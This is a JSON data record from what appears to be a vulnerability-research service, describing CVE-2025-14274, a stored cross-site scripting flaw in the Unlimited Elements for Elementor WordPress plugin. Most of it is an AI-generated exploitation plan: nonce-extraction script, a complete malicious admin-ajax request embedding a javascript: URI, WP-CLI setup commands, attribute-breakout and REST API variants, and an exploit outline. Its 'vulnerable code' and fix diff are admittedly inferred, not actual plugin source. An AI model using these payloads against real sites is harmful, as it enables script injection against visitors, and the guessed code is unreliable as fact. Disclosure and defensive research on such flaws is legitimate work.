[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVoG4EniEIfFOzWlvORSzcWPU6NzgJhXLTzE5PJpGAkQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14274","unlimited-elements-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-border-hero-widget","Unlimited Elements for Elementor \u003C= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Border Hero Widget","The Unlimited Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Border Hero widget's Button Link field in versions up to 2.0.1. This is due to insufficient input sanitization and output escaping on user-supplied URLs. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","unlimited-elements-for-elementor",null,"\u003C=2.0.1","2.0.2","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-02 17:17:14","2026-02-03 05:30:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F482c4986-3677-4754-992b-ea9be7573d2e?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-14274\n\n## 1. Vulnerability Summary\nThe **Unlimited Elements for Elementor** plugin (up to v2.0.1) contains a stored Cross-Site Scripting (XSS) vulnerability in its **Border Hero** widget. The vulnerability exists because the plugin fails to sanitize or escape the `url` property of the \"Button Link\" field. A Contributor-level user can embed a malicious payload (e.g., a `javascript:` URI) into the widget's settings. When the page is rendered for any visitor, the payload is injected into the `href` attribute of a button, leading to script execution when the button is clicked or, depending on the template, potentially via attribute breakout.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (via Elementor's AJAX handler)\n- **Action:** `elementor_ajax`\n- **Sub-Action:** `save_builder_data`\n- **Vulnerable Parameter:** `url` within the settings of the `uc_border_hero` (inferred) widget type.\n- **Authentication:** Contributor or higher (any role with `edit_posts` capability for a specific post\u002Fpage).\n- **Preconditions:** The \"Unlimited Elements\" plugin and \"Elementor\" must be active. The \"Border Hero\" widget must be available in the Unlimited Elements library.\n\n## 3. Code Flow (Inferred)\n1. **Input:** A user edits a post with Elementor and adds\u002Fupdates a **Border Hero** widget.\n2. **AJAX Call:** Elementor sends a JSON-encoded representation of the page layout to `admin-ajax.php` with the action `elementor_ajax`.\n3. **Storage:** WordPress\u002FElementor saves this data into the `_elementor_data` post meta field.\n4. **Processing (Unlimited Elements):** When the frontend page is requested, Elementor initializes the Unlimited Elements widget.\n5. **Rendering:** The `render()` method of the widget class (likely extending `unlimited_elements_base_widget`) retrieves the settings.\n6. **Sink:** The template for the **Border Hero** widget (often a `.twig` or `.php` file in the plugin's `addons` directory) outputs the \"Button Link\" URL directly into an HTML attribute without using `esc_url()`.\n\n## 4. Nonce Acquisition Strategy\nElementor requires its own nonces for saving builder data. The `wp_create_nonce('elementor_ajax')` nonce is typically exposed in the Elementor editor's configuration object.\n\n1. **Step 1:** Create a new page as a Contributor: `wp post create --post_type=page --post_status=publish --post_title=\"XSS Test\"`.\n2. **Step 2:** Navigate to the Elementor editor URL: `wp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Step 3:** Use `browser_eval` to extract the required nonce from the `elementorConfig` object.\n\n**Extraction Script:**\n```javascript\n\u002F\u002F Locate the nonce for elementor_ajax\nwindow.elementorConfig?.nonces?.save_builder_data || window.elementorConfig?.nonces?.save_builder\n```\n\n## 5. Exploitation Strategy\nThe goal is to send a direct AJAX request to save a malicious widget configuration to a post.\n\n### HTTP Request (via `http_request` tool)\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```urlencoded\naction=elementor_ajax\n&_nonce=[EXTRACTED_NONCE]\n&actions={\n  \"save_builder_data\": {\n    \"action\": \"save_builder_data\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"exploit-id-1\",\n          \"elType\": \"section\",\n          \"elements\": [\n            {\n              \"id\": \"exploit-id-2\",\n              \"elType\": \"column\",\n              \"elements\": [\n                {\n                  \"id\": \"exploit-id-3\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"uc_border_hero\",\n                  \"settings\": {\n                    \"button_link\": {\n                      \"url\": \"javascript:alert(document.domain)\",\n                      \"is_external\": \"\",\n                      \"nofollow\": \"\",\n                      \"custom_attributes\": \"\"\n                    },\n                    \"button_text\": \"Click Me\"\n                  }\n                }\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  }\n}\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `unlimited-elements-for-elementor` v2.0.1 is installed and activated.\n2. **Widget Activation:** In the Unlimited Elements dashboard (`wp-admin\u002Fadmin.php?page=unlimited_elements_addons`), ensure the \"Border Hero\" widget is installed\u002Factivated (it may be under the \"Hero\" category).\n3. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n4. **Post Creation:**\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_author=[ATTACKER_ID]\n   ```\n\n## 7. Expected Results\n- The AJAX response should return `{\"success\":true,\"data\":{...}}`.\n- When navigating to the page frontend (`?p=[POST_ID]`), the HTML source should contain:\n  `\u003Ca ... href=\"javascript:alert(document.domain)\">Click Me\u003C\u002Fa>`\n- Clicking the button (or it being triggered via other attributes if injected) will execute the JavaScript.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the payload is stored in post meta.\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n   Check for the string `\"url\":\"javascript:alert(document.domain)\"`.\n2. **Frontend Check:** Use `browser_navigate` to the page and check for the presence of the payload in the DOM.\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If `javascript:` is blocked by a basic filter but `esc_attr` is still missing, try:\n  `\"url\": \"https:\u002F\u002Fgoogle.com\\\" onmouseover=\\\"alert(document.domain)\\\" data-x=\\\"\"`\n- **REST API Injection:** If the `elementor_ajax` action is restricted, attempt to update the `_elementor_data` meta via the REST API if the Contributor has permission to edit their own posts:\n  `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fpages\u002F[POST_ID]` with `meta: {\"_elementor_data\": \"...\"}`.\n- **Shortcode Injection:** If the widget can be rendered via a shortcode provided by Unlimited Elements, try to inject the payload via shortcode attributes in a standard post body.","The Unlimited Elements for Elementor plugin (v2.0.1 and below) is vulnerable to stored Cross-Site Scripting (XSS) because it fails to sanitize or escape the URL in the 'Button Link' field of the Border Hero widget. Authenticated attackers with Contributor-level access can inject malicious 'javascript:' URIs, which execute in the context of the user's browser when the button is clicked on the frontend.","\u002F\u002F Inferred from plugin structure and research plan\n\u002F\u002F File: provider\u002Fcore\u002Fplugins\u002Funlimited_elements\u002Felementor\u002Fwidgets\u002Fuc_border_hero.php or similar widget render logic\n\npublic function render() {\n    $settings = $this->get_settings_for_display();\n    $button_url = $settings['button_link']['url']; \u002F\u002F No sanitization or esc_url applied here\n    \n    \u002F\u002F ... (widget HTML generation) ...\n    ?>\n    \u003Cdiv class=\"uc-border-hero-button\">\n        \u003Ca href=\"\u003C?php echo $button_url; ?>\" class=\"uc-button\">\u003C?php echo $settings['button_text']; ?>\u003C\u002Fa>\n    \u003C\u002Fdiv>\n    \u003C?php\n}","--- a\u002Fprovider\u002Fcore\u002Fplugins\u002Funlimited_elements\u002Felementor\u002Fwidgets\u002Fuc_border_hero.php\n+++ b\u002Fprovider\u002Fcore\u002Fplugins\u002Funlimited_elements\u002Felementor\u002Fwidgets\u002Fuc_border_hero.php\n@@ -...\n-    $button_url = $settings['button_link']['url'];\n+    $button_url = !empty($settings['button_link']['url']) ? esc_url($settings['button_link']['url']) : '#';\n@@ -...\n-    \u003Ca href=\"\u003C?php echo $button_url; ?>\" class=\"uc-button\">\n+    \u003Ca href=\"\u003C?php echo $button_url; ?>\" \u003C?php echo $this->get_render_attribute_string('button_link'); ?> class=\"uc-button\">","The exploit involves an authenticated attacker with Contributor-level permissions (or higher) performing the following steps:\n1. Log in to the WordPress admin panel and create or edit a post\u002Fpage using the Elementor editor.\n2. Add the 'Border Hero' widget (provided by Unlimited Elements) to the layout.\n3. Navigate to the widget's settings and locate the 'Button Link' URL property.\n4. Input a malicious payload such as `javascript:alert(document.domain)` or `javascript:void(0);\u002F*\"onmouseover=\"alert(1)\"*\u002F` into the URL field.\n5. Save or update the page via the `elementor_ajax` endpoint (action: `save_builder_data`). The payload is stored in the `_elementor_data` post meta.\n6. When any user views the published page and interacts with the widget button (e.g., clicking it or hovering if using attribute breakout), the injected JavaScript executes.","gemini-3-flash-preview","2026-04-27 17:16:40","2026-04-27 17:17:07",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.5.132","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags\u002F1.5.132","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funlimited-elements-for-elementor.1.5.132.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elements-for-elementor\u002Ftags"]